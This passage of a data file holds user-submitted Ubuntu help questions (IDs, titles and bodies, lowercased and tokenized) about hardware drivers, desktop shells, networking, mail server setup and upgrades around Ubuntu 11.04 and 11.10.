when the # cdrom share is accesed . for this to work /etc/fstab must contain # an entry like this : # # /dev/scd0 /cdrom iso9660 defaults , noauto , ro , user 0 0 # # the cd-rom gets unmounted automatically after the connection to the # # if you do n't want to use auto-mounting/unmounting make sure the cd # is mounted on /cdrom # ; preexec = /bin/mount /cdrom ; postexec = /bin/umount /cdrom when i re-starting the system the same problem still exist.the system correctly ping from remote host.i have executed the above commands.initially i run the command `` sudo iptables -f '' its okey in first time . now its not working . i tried all command you mentioned above , please assist me ...
65428	manage your terminals	i work with terminals all the time , and most of the windows opened are teminals . i would like to get them somehow organized , for example in tabs . but the problem is i open them from nautilus ( open in remote terminal https : //github.com/umpirsky/nautilus-scripts/blob/master/open % 20in % 20remote % 20terminal ) so it opens always a new window . is there any tool that can keep then on one terminal window in separate tabs ? i saw terminator , but that works separated from native ubuntu terminal app .
65429	philips saa7134 tv tuner card not working	when i run tvtime , it gives me the following output in terminal : running tvtime 1.0.2 . reading configuration from /etc/tvtime/tvtime.xml reading configuration from /home/md/.tvtime/tvtime.xml xvoutput : no xvideo port found which supports yuy2 images . *** tvtime requires hardware yuy2 overlay support from your video card *** driver . if you are using an older nvidia card ( tnt2 ) , then *** this capability is only available with their binary drivers . *** for some ati cards , this feature may be found in the experimental *** gatos drivers : http : //gatos.souceforge.net/ *** if unsure , please check with your distribution to see if your *** x driver supports hardware overlay surfaces . also i have intel 845gvsr motherboard and my tv tuner worked in past editions of ubuntu with this options saa7134 card=3 tuner=69 option putting inside /etc/modprobe.d/options file .
65430	how should i suggest a developer switch to an application indicator ?	i use several applications with non-appindicator indicators . this means the ui for them is inconsistent ( on ubuntu at least , if not elsewhere ) . i 'd like to suggest they switch to using application indicators in a friendly , helpful way . what would do the trick ? please add new answers below or add comments , especially regarding anything anything incorrect or missing . ( would it make more sense for this be a community wiki ? ) a lot of this content came from an au answer . how do i credit it properly ?
65432	do application indicators work/help outside linux ?	if someone created an application that used application indicators , which are famously supported across multiple linux desktops , would it benefit them on windows or mac os ?
65434	how i can monitor traffic on a certain port with munin ?	how i can monitor traffic on a certain port with munin ? i already use plugin port_ to see number of connection on a certain port , but i also need to see the traffic .
65435	integrated bluetooth and webcam not working asus z53u	i have installed ubuntu 11.04 32 bit on a asus z53u m/b f3u ( athlon x2 64 ) which has both bluetooth and a 1.3 mpx webcam on-board . both wont work : does n't find the bluetooth module webcam wont load on cheese , camorama and other webcam applications . either a black screen or coloured lines appear when i try to load it in any app . i ca n't find anything to fix these problems ( drivers.. ? ) . can anyone help ? many thanks
65439	modifying key- and mouse-bindings for gnome shell	is there an easy way to modify key- and mouse-bindings for gnome shell ? the gnome-tweak-tool is far from complete regarding these issues and the system settings does n't include any such options . i guess there is always the possibility of opening the [ gd ] conf-editor . if that is our final resort for now what key patterns are involved then ?
65441	what pci wifi cards work with 11.04 ?	i 'm looking for a stable wifi card that will work with ubuntu 11.04 64 bits without not too many steps to configure it correctly..just install and start up . i found this list but there is n't any reference to the ubuntu release.. regards javi
65443	nautilus on ubuntu 11.10 keeps crashing	i noticed that my nautilus keeps crashing when i open a folder video : http : //www.screenr.com/b20s if more info is required just let me know how i can get them
65446	how can i force déjà dup to make a full backup ?	my déjà dup backup seems to be corrupted , at least it tells me on every backup that there 's a crc error and aborts the backup . now i think with a full backup i could fix this , but i have n't found a way to do that easily . so , is there a setting in déjà dup i could use or some simple steps with duplicity ( considering that i want it to respect my déjà dup settings . ) ?
65447	latex build server with git	i have a latex project in git , there is a makefile . so basically a server would have to do this : git checkout master make > logfile 2 > & 1 given that i push into a repo on the server . i could do this with a cron job , but it seems kind of missing the point . is there some way to initiate this after i pushed via ssh ?
65450	how do i change resolution without screen in jupiter applet ?	i have a problem . screen broke on my netbook , so i decided to connect it to tv . the first thing i did was changing screen resolution with jupiter applet to too large , so tv switch off and did n't show anything from netbook . please , help me ! i do n't know how i can set screen resolution to standard .
65457	window too big , ca n't resize or maximize	i 'm running kate under gnome . somehow it was resized to a too-large size for my desktop . so now the maximize and resize buttons are unreachable . i 'm assuming reinstalling would fix the problem , but if i can fix it without reinstalling that would be ideal . any ideas/suggestions are much appreciated . ( i have tried the keyboard shortcuts , with no results . )
65458	can i have gnome-shell and unity together ?	can i have gnome-shell and unity available in ubuntu ? i mean can i switch between gnome-shell and unity at the login session ?
65460	how can i add a script to nautilus for running selected file as administrator ?	how can i add a script to nautilus for running selected file as administrator ( not open as administrator ) ? and if it is possible , i want to run this file as administrator without entering my password .
65461	can i distribute an ubuntu appliance ?	for my computer class we need linux . so i recommend to get virtual box and ubuntu . but since there has to be tex and emacs installed which is non-trivial for novices , i thought i might set up an appliance to help them . i realize that it is free software for the most part , but i am not sure how to handle the ubuntu brand name in this case . is it legal to create a ubuntu vm , install some packages and make the bundle available for download ?
65465	looking for a super-low-power any-arch diy squeezebox reciever	as i said in another recent question , i 've recently bought into the logitech squeezebox range . i have a radio ( bedroom ) , boom ( kitchen ) and receiver ( music room ) . these are all pretty good but they only cover three rooms . i ca n't afford another âł100 per room so i 'm looking to get creative for the bathroom and the living room . there is an unofficial squeeze client that can make a computer act as a device music can come out of . it 's great . i 've got it running on my desktop now and can control it with my phone and sync it up with the rest of the house . obviously i do n't want a desktop in every room ( well , only a little bit ) so i 'm looking for a box that fits the following : wireless networking ( wpa2psk/aes ) stereo sound card some sort of storage that i can install ubuntu server/minimal on it does n't need usb for running but i will need to install from something ... so usb is probably required too . cheap . around the âł50 point would be ideal . any more and i 'll probably just go with a second hand logitech device . edit : there are devices like the beagleboard and pandaboard that will do the job , just too well . i do n't need a dual core processor or hd video output ( needless to say 3d video output ) . these sorts of things are what makes the bb and pb so expensive ( actually they 're quite cheap compared to a pc but that 's not what the problem domain needs )
65466	make a wine installed video player default player	i have installed divx player ( version 6.6 ) using wine in my ubuntu 11.10 . is there any way to make it a default player to play certain video formats ? thanks in advance .
65468	where can i find a subversion 1.7 binary ?	does anybody know of a ppa or source i can get a subverison 1.7 deb ? it was just released yesterday so i 'm sure something will show up eventually . however i figure this will be a good place to post when something is released .
65470	how do i get the stylus working on a lenovo x220 tablet ?	i have just got a lenovo x220 tablet and i would like to have a dual boot with ubuntu . i installed it successfully but after installing inkscape and xournal i realized that the stylus does n't work ( it seems that it is not recognized ) . has anyone encountered this problem and solved it in a lenovo tablet ? thanks a lot
65471	how to upgrade ghost script to the latest version ?	i have default ghostscript version 8.71 installed in my ubuntu machine i would like to update it to the latest version i download the file from http : //downloads.ghostscript.com/public/ghostpdl-9.01.tar.gz when i run make command i get error o -c ./obj/gsromfs1.c ./obj/echogs -w ./obj/ldt.tr -n - gcc -o ./bin/gs ./obj/echogs -a ./obj/ldt.tr -n -s ./obj/gsromfs1.o ./obj/gs.o -s cat ./obj/ld.tr > > ./obj/ldt.tr ./obj/echogs -a ./obj/ldt.tr -s - -ldl -lm -rdynamic -ldl -lpthread -lm if [ x ! = x ] ; then ld_run_path= ; export ld_run_path ; fi ; \ xcflags= xinclude= xldflags= xlibdirs= xlibs= \ feature_devs= device_devs= device_devs1= device_devs2= device_devs3= \ device_devs4= device_devs5= device_devs6= device_devs7= device_devs8= \ device_devs9= device_devs10= device_devs11= device_devs12= \ device_devs13= device_devs14= device_devs15= device_devs16= \ device_devs17= device_devs18= device_devs19= device_devs20= \ device_devs_extra= \ /bin/sh < ./obj/ldt.tr /usr/bin/ld : can not find -lxext collect2 : ld returned 1 exit status make : *** [ bin/gs ] error 1
65473	how to batch remove bad character from file-names ?	i have files that had slovak characters in them i copied them to my ubuntu now they have these weird symbols in them , anyone knows how would i remove these character ?
65475	`` sql engine 'mysql ' not supported '' with saslauth	i 'm having trouble authenticating incoming smtp authentication to my postfix server ( using cyrus sasl with a mysql backend ) . in my auth.log i get : postfix/smtpd [ 3389 ] : sql auxprop plugin using mysql engine postfix/smtpd [ 3389 ] : sql engine 'mysql ' not supported postfix/smtpd [ 3389 ] : auxpropfunc error no mechanism available postfix/smtpd [ 3389 ] : _sasl_plugin_load failed on sasl_auxprop_plug_init for plugin : sqlite postfix/smtpd [ 3389 ] : sql plugin parse the username < email > postfix/smtpd [ 3389 ] : sql plugin try and connect to a host postfix/smtpd [ 3389 ] : sql plugin trying to open db 'postfix ' on host 'localhost' and my /etc/postfix/sasl/smtpd.conf looks like this : pwcheck_method : saslauthd mech_list : plain login cram-md5 digest-md5 log_level : 7 allow_plaintext : true auxprop_plugin : sql sql_engine : mysql sql_hostnames : localhost sql_user : -removed- sql_passwd : -removed- sql_database : postfix sql_select : select password from mailbox where username = ' % u @ % r' essentially i understand what it 's saying , that it ca n't find a mysql authentication module , however i have installed both libsasl2-modules-sql and postfix-mysql . what am i missing ?
65476	at what time will the upcoming ubuntu release be made available ?	every six months a new ubuntu version will be released . does anyone know at which time this will be ?
65487	invoke a wine installed application from command line	i have installed divx player using wine in my ubuntu . i would like to invoke the player from terminal . is it possible ? if yes , how ? thanks in advance .
65495	installing 11.10 beta 2 from usb very slow	i am trying to install ubuntu on an older tower pc i have from usb , its horrible slow , i can bear with the waiting at the boot screen for 5 minutes but when i get into the install menus it takes for ever to get to the next page of the install process , i 've left my computer on all night and i work up the next morning and it was finally on the next page . however i tried to get to the next page of install and it was back to waiting for hours . my linux key is made with unetbootin on a linux machine , so i am trying to boot with the tag acpi=noirq but it is n't helping i am still at the splash screen for ... going on 5 minutes now . now i 'm not even sure if i entered the tag in properly , it says hit tab to edit options and i just typed the tag in a pressed enter .
65498	how to access other partitions/disks ?	there was an icon called `` my computer '' to ubuntu 11.04 that allowed access to all available disks and partitions . however , i could not find anything similar in ubuntu 11.10 . anyone know if this feature was removed ?
65500	can i ssh ( into a mobile device ) via usb ?	i have a tablet with a usb connection to a host computer . ( ideally the host is running windows , but if absolutely necessary i could switch the host to be ubuntu also . ) i want to be able to ssh into the device without rs-232 , wifi , or other network connection . what software combination and setup do i need to make this happen ? basically , i 'd love the be able to have the equivalent of adb shell , but for when the tablet is running pure ubuntu , not android . the tablet happens to be running 9.04 , but i 'd be happy to upgrade it if required .
65502	desktop login sound does n't play after login	i 've been looking around for a solution for this , but did n't found it . i remember that from usb ( live session ) ubuntu had all its sounds . but after installed and after login , desktop-login sound never play . i 've been looking at dconf-tool without success . any idea ?
65505	how do i get the compiz snow plugin working ?	i 've got some trouble installing the snow plugin in ubuntu 11.10 . i found some tutorials to build it from git but it wo n't work for me . spent all day long to get it run but it wo n't . so is there anybody with an answer how to get unsupported compiz plugins , or just the snow plugin run ?
65507	how to approve a contact in empathy ?	i have a tiny but important problem . someone has added me to their contact list on msn , this shows up with a notification . the problem is that i ca n't find out how to approve the invitation . how can i do it ?
65508	file transfer from pc to usb disk is very slow	file transfer from pc to usb disk is very slow in my ubuntu 11.04 ( 64bit ) but the vice versa is not.transfer starts with like , for the transfer of 700mb file it starts with 30mb/s and towards the end it stops at 0s and stays put for like 3-4 mins to transfer the last bit . any help to solve this welcome
65509	should i install 11.10 daily release now or rather wait ?	should i install ubuntu 11.10 now or is better choice wait to official relase ? i know that update should be possible after that but i 'm afraid that i will have unnecessary files on my computer from beta version ( so , bad windows experiences : ) upgrade in windows is always horror ) . thank you very much .
65512	ubuntu one phone files are synicing but i can not view them from desktop can see them from web interface	i have the ubuntu one app for droid and i am running ubuntu 10.04 lts . i can take a picture on my phone and sync it to ubuntu one . it has a special folder for my mobile pictures and documents . i can see these folders and files in the droid app and in the web interface . i can not see them in the regular ubuntu one folder on my desktop . i can add files from my desk top to the folder and they sync . i just ca n't see the folders and files from the phone . i have searched all my folders .
65521	waiting for network configuration message at boot , then blank screen	when i boot ( 11.10 ) , i get the message that it 's `` waiting for network configuration '' and then the same , but `` 60 seconds longer '' and then finially it `` boots '' but to a black screen . no cursor , just black . it does n't seem to respond to anything . i am able to boot with the `` recovery '' kernel and do anything you can normally do there . except `` root prompt with networking '' does n't actually have networking . ifconfig returns nothing . iwconfig says that eth0 and lo are uninitialized . i was going to load the networking kernel module , but i do n't know which one to load . i am also able to boot with a live cd ( technically a usb drive ) and it boots fast with no messages/errors and networking works . the networking adapter is from a gigabyte ga-m57sli-s4 motherboard . i have read this : `` waiting for network configuration '' adding 3 to 5 minutes to boot time this does n't seem to help my problem . my /etc/network/interfaces had auto lo iface lo inet loopback so i added auto eth0 iface eth0 inet dhcp this solution here : network not starting up on boot gives the error that /etc/init.d/dhcp3-server : file does not exist .
65527	is upgrading to online more dangerous - or not as good - as a fresh install ?	i read as an answer to another question that when upgrading to oneiric , a fresh install is best and that one should avoid updating online . if this is true , why is it so ? what are the dangers , if any , of updating online . there is another question , written when maverick was released , that deals somewhat with this question , but it is n't for oneiric ( and things could have changed ) . it also does n't directly deal with what might be bad about installing online . besides , as someone who started with natty , i 've never upgraded before . i suspect there are many like me , who would like current answers to questions about how to upgrade .
65528	what is the best way to download a new ubuntu release ?	i like having a live cd to boot from ( i 'm presuming you can upgrade from 11.04 to 11.10 from the live cd ) in case of any problems , as i 'm a bit of a fiddler , so i 'd like to know if direct download ( ubuntu.com , mirror ) or a torrent would be the fastest way on day one ? i know this is probably subjective , depending on how many people are doing each , but really i 'm worried about the stability of a large download . i 'd like it done faster , but if direct is likely to slow down or have an error i 'll torrent . did the network have any errors during downloads on the release of 11.04 ?
65533	no bluetooth adapter is present	i 've a sony vaio vpceh1s0e and i 've got a problem with bluetooth . my bluetooth applet is running but there 's no way to configure my bluetooth device because ubuntu says that `` no adapter is present '' . this is the output of rfkill list : 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : sony-wifi : wireless lan soft blocked : no hard blocked : no 2 : sony-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no this is the output of hcitool dev : devices : this is the output of dmesg | tail after i 've turned on bluetooth : [ 1590.367523 ] hci_cmd_timer : hci0 command tx timeout [ 1591.367014 ] hci_cmd_timer : hci0 command tx timeout [ 1592.366483 ] hci_cmd_timer : hci0 command tx timeout [ 1593.365992 ] hci_cmd_timer : hci0 command tx timeout and finally this is the output of lsmod : bluetooth 166112 13 bnep , rfcomm , btusb so what can i do to find my bluetooth adapter ?
65541	will i be able to install full-disk encryption with the live cd installer ?	i 'm looking forward to installing oneiric . but i need to have full-disk encryption . i , along with over 6,800 other ubuntu users , have been patiently waiting for the live cd installer to gain the ability to setup full-disk encryption . will i be able to install full-disk encryption on 11.10 with the live cd installer ?
65542	only creates the added folder , but no files are uploaded in windows	i have added a folder outside the default folder . after a while it showed up on the website and after restarting the client on my machine it showed up there , too . it says `` file sync is up-to-date '' but none of the files in the added folder are being uploaded . edit : here are some logfiles syncdeamon.log credentials.log controlpanel.log syncdaemon-exceptions.log is empty status.log 2011-10-12 21:32:41,460 - ubuntuone.status - debug - server connection lost 2011-10-12 21:34:42,111 - ubuntuone.status - debug - server connection made 2011-10-12 21:35:03,219 - ubuntuone.status - debug - server connection lost 2011-10-12 21:37:03,966 - ubuntuone.status - debug - server connection made and so on ... syncdaemon-exceptions.log.2011-10-11_23-34-29 : 2011-10-11 23:32:25,861 - twisted - error - unhandled error in deferred : 2011-10-11 23:32:25,861 - twisted - error - unhandled error traceback ( most recent call last ) : file `` twisted\internet\defer.pyc '' , line 361 , in callback file `` twisted\internet\defer.pyc '' , line 455 , in _startruncallbacks file `` twisted\internet\defer.pyc '' , line 542 , in _runcallbacks file `` twisted\internet\defer.pyc '' , line 1076 , in gotresult -- - < exception caught here > -- - file `` twisted\internet\defer.pyc '' , line 1020 , in _inlinecallbacks file `` ubuntuone\platform\windows\ipc.pyc '' , line 1140 , in connect ubuntuone.platform.windows.ipc.noaccesstoken : got empty credentials .
65544	how long does it take to get an application reviewed for ubuntu ?	i submitted a package around three weeks ago , and so far it 's status is still `` pending ''
65545	how do i switch to another sound theme ?	i 'd like to change default sound theme to ubuntustudio-sounds , but do n't understand how to do this .
65546	gnome shell and gnome fallback session not working after upgrade to 11.10	i upgraded from natty to oneiric ocelot through update manager : the xfce and unity sessions have been perfectly preserved and work just like they should , but i 'm having trouble with the gnome and gnome classic sessions . starting in either results in an empty screen with an application menu bar on top ( no panel or such ) and tint2 at the bottom ( i used it with my gnome 2.3 session ) . window decoration fails and generally it is only possible to log out . how can i set up a regular gnome shell session ? thanks for your time !
65549	var/cache/apt/archives occupying huge space	i am in the process of cleaning up my system . and i see a lot of space occupied by this folder /var/cache/apt/archives ( 1.5gb ) . is it absolutely necessary to keep all these archives ?
65553	how do i install qt sdk 1.1.3 ?	has anyone had the same problem that i have with the full nokia qt sdk offline installer that i have experienced with ubuntu 11.1 ? ? what happens is that when i run the installer it tells me that i need a c++ complier . ok no issues there i just install one from software manager . the issue is that when it tries to install to /home/ ... /qtsdk the whole system hangs , hd active light comes on then nothing ... i reboot to fine my home folder has been corrupted and nautilus crashes.. i prefer the nokia sdk because the repositories are a little behind the official nokia releases . hope someone can help clear this issue for me ... .
65554	my 1440x900 resolution is not recognized	today i decided to install ubuntu 11.10 , and it did not recognize my resolution - 1440x900 . this has already happened in other versions of ubuntu . however , in 11.10 i can not get this resolved . can anyone help me ? my pc : intel corporation 82945g/gz proview 19 '' 1440x900 ubuntu 11.10 ( oneiric ) kernel linux - 3.0.0-12-generic i tried the instructions in this blog post .
65555	reinstall of os after cpu upgrade needed ?	i recently upgraded my cpu from an athlon ii x2 250 to the athlon ii x4 610e ( 45w 4 cores -- ca n't beat the efficiency ) . is an ubuntu reinstall required ?
65557	is ubuntu one files available for ipad client ?	i saw the post about there being ubuntu one files for the iphone in the works , is there one for the ipad as well ? this would be very helpful for my work .
65558	how can i prevent certain directories/files from appearing in unity 's dash ?	this question may sound similar to the following for which solutions are documented : how can i keep recent files from appearing in unity ? but my problem is that the dash ( in 10.10 ) not only lists recently touched files but all files on my mounted partitions ( = obviously they are getting indexed automatically ) . is there any way to make zeitgeist ( the responsible application i guesss ) exclude certain files/directory hierachies ? or is there any way to disable this kind of indexing completely ? thanks in advance !
65563	how do i set an environment variable at boot time ( via a script ) ?	i 'd like to set a couple of environment variables ( at boot time ) on an ubuntu machine ( 10.04 ) , but i want to create their value via a script , much like : export the_env_var= $ ( script_to_execute_and_use_stdout_from ) the reason i want to do this is that the commands used to set the environment variables take long time to execute ( 10s or so ) , so that 's why i only want to do it once after boot . anyway , currently i solved this by caching the result of the command at boot time , so that subsequent calls will go fast , thus not using env . variables at all . i 've tried setting in /etc/environment , but that only copies rhs verbatim i 've tried executing a script in /etc/init.d/ at startup , but that does not seem to work . ideas ?
65564	apple magic mouse/ apple magic trackpad /bring up all windows gesture	hello everyone my question is . is it possible for the magic mouse to have different gesture other than the scroll wheel gesture . i wanted to do the bring up all windows gesture or the super + w gesture . do you guys know if the mouse is going to have better support in ubuntu 11.10 ? is there any software that can enable me to do different gestures with the mouse just like how it works in os x ? trackpad question i been trying to configure magic trackpad also with touchegg , but touchegg is not working for me . what do i do help me out guys ! ! ! i do n't if i did the installation wrong or what . i 'm running ubuntu 11.04 . how do i disable the unity gestures to allow touchegg to run . i think i found the answer to my problem . i think i 'm using the wrong gui with the wrong version . currently i have vr.1 and running the 0.3 gui , which is not working at all . i check the touchegg forums and it seem like jose the guy that created the program is working on the vr.1 gui .
65565	headphone output is far too loud	i am using ubuntu 11.10 ( oneiric ocelot ) , with a `` intel corporation 82801g ( ich7 family ) ac'97 audio controller ( rev 01 ) '' sound card . when i plug headphones into the front headphone port , the sound that comes out is far too loud to listen to - and has to be turned down to about 5 % . anything above that is distorted and deafening . i have played around in alsamixer , and whilst a decent level can be achieved ( through changing three separate sliders ) , this is not ideal for changing the volume on my parents ' computer . and using the standard volume control overrides all of that anyway .
65567	central data storage for apps in software center	i am trying to make a package for the software center , but so far the problem is that there seems to be no central place to store data for all users . we need that to store license files that the application can later add if the users want to use the non-free parts of our software . also we use this for storing document templates that some users edit and make them available for all users on the system . is there any solution for this kind of problems ? from what i see on this page : http : //developer.ubuntu.com/publish/ write all configuration settings to ~/. < pkgname > ( this can be one file or a directory containing multiple configuration files . ) edit : while talking to the ubuntu staff it turns out there is no way you can have a central file storage for all users . at least not at the moment . i tried adding scripts to the debian source package that would create folders , but the staff looked at them and did not approve the version . at the moment we are saving the common files in the user .config folder .
65570	radeon hd 6950 temperature is way too hot	i 'm using ubuntu 11.10 with the default video driver because with the proprietary one the animations/window moving/video play is laggy and slow . with the default driver everything is fine except that after a while there is a strange graphic glitch and the card itself is burning . i do n't know the exact temperature but if i touch the card while using windows it 's normal but when i use ubuntu it 's burning ( without any stress in both cases ) . here are some screenshots about the graphic problem :
65576	how can i upgrade my device to apple ios 5 ?	how can i download and install the new version of ios ( ios 5 ) on my ipod using my ubuntu system ? do i have to give up and just find a mac os / windows machine ? relevant details : ipod touch 4th-gen ubuntu 11.04
65580	how can i easily send a window to the back of a stack ?	i like to work with a number of apps open on a secondary monitor , one with a maximized window , and several more that are manually tiled in a particular way on top of them , just exposing a particular part of the maximized app so that i can see if it needs attention . i would like to be able to quickly and easily send the maximized window to the back of the stack when i 'm done with it to reveal all the other windows i have there so i can focus on them instead . right now i either alt-tab through the windows to bring them to front , or live with them being out of view for awhile , which is sub-optimal . suggestions as to how to achieve this ? something like an entry in the right-click menu on the title bar for `` send to back '' would be great , but i 'd settle for just about anything simpler than what i 'm doing now .
65584	what plugins are needed to use voice/video chat in empathy ?	i would like to voice/video chat with google talk contacts in empathy , but the options are disabled . the help page indicates that this may be due to missing plugins . what plugins must i install to get this working ?
65594	is there a quick way to bring up the login window if it 's not present after reboot ?	i 'm running ubuntu 10.04 with the kde manager . to make a long story short ( long story below ) it now takes a long time for the kde user login window to appear after reboot . basically , for a minute or two i 'm simply starting at the background to the usual log in window but have not place to user name , enter password , etc . my current workaround is simply to wait , but it is frustrating . two questions : is there a quick way to bring up the login window if it 's not present ? what can i do so i do n't get this behavior ? interestingly enough , if i log out , i do get the login window immediately . it 's only after reboot that it takes a long time to appear . ( background : why am i rebooting ? i have a dual boot machine and i do need to do some things in windows xp for my job . ) the long story is that since upgrading to 10.04 lts -- about april , 2011 -- i sometimes get a message when rebooting that x windows has dropped into low resolution mode . i 'm then presented with some choices . usually i simply power cycle at this point . today , i foolishly chose `` reset to defaults . '' fortunately i had a saved copy of /etc/x11/xorg.conf , so i overwrote the existing xorg.conf with the save copy and rebooted .
65596	how to make nautilus launcher _with_ quicklists behave like normal nautilus launcher in unity	i followed this question : how to add my favorite places as a quicklist in my home 's icon in unity ? and created the launcher . it 's pretty good , as you can see here : but when i click it ( be 'it ' itself or any of the shortcuts ) another launcher , the dull one , gets to represent nautilus in unity , as you can see here : i even backed nautilus.desktop up at /usr/share/applications so and then copied my custom launcher to this system folder -- - but it still does n't work ! ! ! so , what can i do ?
65598	how can i get mutt to stop making vim insert line breaks every few characters ?	every time i type an email with mutt , it inserts these line breaks every 70 characters or so . i 'd rather it just relied on word wrap instead , since my editing style ( lots of revision ) makes reformatting a pain . is there a way to set this up in muttrc ?
65599	iwl3945 vs. iwlwifi , what are the differences ?	is there a different wifi driver to try or do i have the 'best ' one already ? i have a stock installation of ubuntu natty ( 11.04 ) on a hp laptop with this network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) lsmod | grep iwl shows : iwl3945 126017 0 iwlcore 148964 1 iwl3945 mac80211 257001 2 iwl3945 , iwlcore cfg80211 156212 3 iwl3945 , iwlcore , mac80211 i 've read about a driver from intel called iwlwifi . is this what i have ? is there a different driver to try ? my wifi works fine , but i 'm trying to see if there is anyway to lower it 's power consumption . powertop shows iwl3945 always at # 2 with ~30 % .
65600	how to show java plugin console	in windows , when i open a web page containing applet , icon of java plugin console is displayed in systray . but in ubuntu , i do n't find any way to show java plugin console . how can i open java plugin console with firefox and chromium in ubuntu ?
65616	how to remove swap from raid1 array ?	can anyone point in the right direction on how to remove swap out of a raid1 configuration ? according to the ubuntu advanced installation guide , here , it said to add swap to the raid but i am having some serious performance issues . i would like to remove it from the array and recreate it , with the same size , on the two separate drives . zero data loss on the data array is a must . its a remote computer so i would prefer to do it via command-line if possible . here is the output from cat /proc/mdstat md0 : active raid1 sdb1 [ 1 ] sda1 [ 0 ] 19530688 blocks [ 2/2 ] [ uu ] md1 : active raid1 sdb2 [ 1 ] sda2 [ 0 ] 957230016 blocks [ 2/2 ] [ uu ] the swap device is md0 .
65619	what time ( mountain daylight time ( mdt ) ) will ubuntu 11.10 be released ?	just wondering what time oneric becomes publicly available as a stable instead of beta .
65621	can i change `` activities '' in gnome-shell to an ubuntu logo ?	i 'm using gnome-shell in oneiric and would like to know if there is a way to change the text `` activities '' ( in the top left corner ) to a picture if the ubuntu logo . i have already succeeded at replacing it with `` ubuntu '' by editing one line in this file : /usr/share/gnome-shell/js/ui/panel.js : from : this._label = new st.label ( { text : _ ( `` activities '' ) } ) ; to : this._label = new st.label ( { text : _ ( `` ubuntu '' ) } ) ; anyone with js expertise here ? could i possibly change this to something like this._label = new st.label ( { image : _ ( /use/share/icons/ubuntu.ico ) } ) ;
65624	can i lower the graphical strain of gnome shell ?	is there some way of configuring `` no effects '' in the backend of gnome shell to get less memory/cpu overhead from graphical applications ? i do n't dare to turn on metacity compositing due to this : metacity fails if compositing is enabled . ( source ) so is there anything else i can do to speed up the user interface and disable any type of effects ?
65625	how to migrate from ubuntu 11.04 to 10.04 ?	( gnome ) i must migrate from ubuntu 11.04 32bit to ubuntu 10.04 32bit . what are my choices ? i 'm thinking about a clean install , so : 1 ) save /home , /etc to a usd hdd 2 ) clean install ubuntu 10.04 3 ) create the users ( 4 ) 4 ) delete the newly created users directories content ( not the . * files ) 5 ) copy back the users /home/* dir 6 ) if anything missing from /etc then that too . or are there any methods to downgrade to 10.04 ? ( like we can upgrade with `` apt-get dist-upgrade '' after upgrading the sources.list file ? )
65630	installing gnu arm toolchain ?	please , do tell me the procedure to compile and install the gnu arm toolchain `` arm-2010q1-202-arm-none-linux-gnueabi '' which i downloaded from codesourcey website . i could not find the deb packages .
65631	files edited through gvfs using eclipse and netbeans getting corrupted . gedit works fine	i 'm facing a strange problem . my development machine was recently moved to ubuntu . when i edit files situated in a network server ( lan ) and then save , the files are getting corrupted . in all cases a few lines from the bottom portion of the source file is being copied/pasted twice . like this : - ... ... ... ... ... ... ... .. ... ... ... ... ... ... ... . < div class= '' corner_lt2 '' > < /div > < div class= '' corner_rt2 '' > < /div > < /div > < /div > < /div > < div class= '' clear '' > < /div > see how the footer and the previous line is copied twice . in both eclipse and netbeans , i 'm accessing the files like this : /home/user/.gvfs/server1 on 192.168.1.5/myproject/file.php gedit works fine , which is accessing the files via smb . the network server is running redhat . also there are other users editing the files through gvfs using both eclipse and netbeans and they say the have n't this problem . anyone knows any solutions or or workarounds ?
65632	why is wireless down/strange after switching to battery or closing/opening the lid ?	i noticed that , when i unplugged my laptop , or closed/opened the lid , my wireless connection dropped , every time . i tracked it down to pm-powersave , and made it stop , see below . this could also cause repeated requests for network passwords .
65633	how can i uninstall vmware-player ?	how can i uninstall vmware-player ? it is not listed in ubuntu software centre or synaptic package manager i am using version 3.1.4
65637	ubuntu failed to detect monitor and very low resolution ?	i tried different versions of ubuntu from 11.04 to 11.10 beta , but got same problem . my desktop pc configuration is , - intel core i5 2400 - dh67bl motherboard - inbuilt motherboard graphics - no extra graphics card attached - acer-h193hqv 18.5 '' monitor - 2gb ram - 250gb harddisk problem : ubuntu ca n't detect my monitor and saying it unknown . moreover , monitor 's original resolution is 1366x768 but in the list of resolution there is only 1024x768 and 800x600 are there .
65638	how to set env with a dot ?	i tried doing that with export and set env , but it did not work . how to do it ? for example ~/directory $ export a.home=1 bash : export : `a.home=1 ' : not a valid identifier
65640	is it possible to download the updates via torrent ?	is there software for ubuntu , which allowes me to download and share the os update packages with torrent ? i want to relieve the servers of canonical , so i already set up an apt cache server . but it would be really great to use ubuntu nearly fully independent of foreign servers . it is clear to me , that there must be servers storing the hashes . but there are torrent solutions like tribler , which does n't need any server .
65645	how can i enable chrome/chromium unity integration ?	i installed ubuntu yesterday on a new laptop . after downloading and installing chrome , i realized that there is no experimental integration gnome3/unity flag in about : flags ? i remember using the integration with chrome on an older machine , is it by some mistake that i ca n't see it here or was it remove from the experimental features of chrome ? i can still see double close/minimize/maximize buttons - one set from the window manager , the other from chrome .
65647	keyboard fn always active	i 've enabled by mistake the fn like caps lock and now if i press shift + 0 , i get / char instead of = because i have a notebook with fn . so , the only way to disable the fn function is to press it . how can i disable it to return to it 's original state ?
65649	application indicators not working on primary monitor	i have a weird problem with application indicators in unity . for example the google chrome indicator only appears on the left ( primary ) monitor , and clicking it with rmb/lmb works as expected . however the synapse , dropbox and feedindicator 's do not respond to any clicks at all , and they show up on both displays . they can be used via right ( secondary ) monitor tho , but this is quite annoying . i 've set systray-whitelist to [ 'all ' ] since i cba to whitelist on-app-basis and this is when the problem begun ( i 'm sure i could click dropbox on both monitors , but then again when it was n't whitelisted i think it was using the new system instead of an applet indicator ) . http : //i.stack.imgur.com/egaro.jpg
65653	upgrade/backport evolution to latest version	i am using ubuntu 10.04 , with default applications . now i have tested ubuntu 11.04 , but it is not a lts version , so i want to upgrade evolution of 10.04 to 11.04 , because the evolution in 11.04 is far better then evolution in ubuntu 10.04 .
65655	my ubuntu does n't seem to be using unity	i 'm running ubuntu 11.04 on my laptop . i upgraded from 10.04 several weeks ago . i noticed that it seems to be using the old gnome 2 user interface . i 'm curious if this is because of my graphics card , which does n't work with any graphics intensive programs , including blender or kde . if it 's any use , lspci | grep vga gives me this output : 01:00.0 vga compatible controller : via technologies , inc. cn896/vn896/p4m900 [ chrome 9 hc ] ( rev 01 ) will unity work on my computer ?
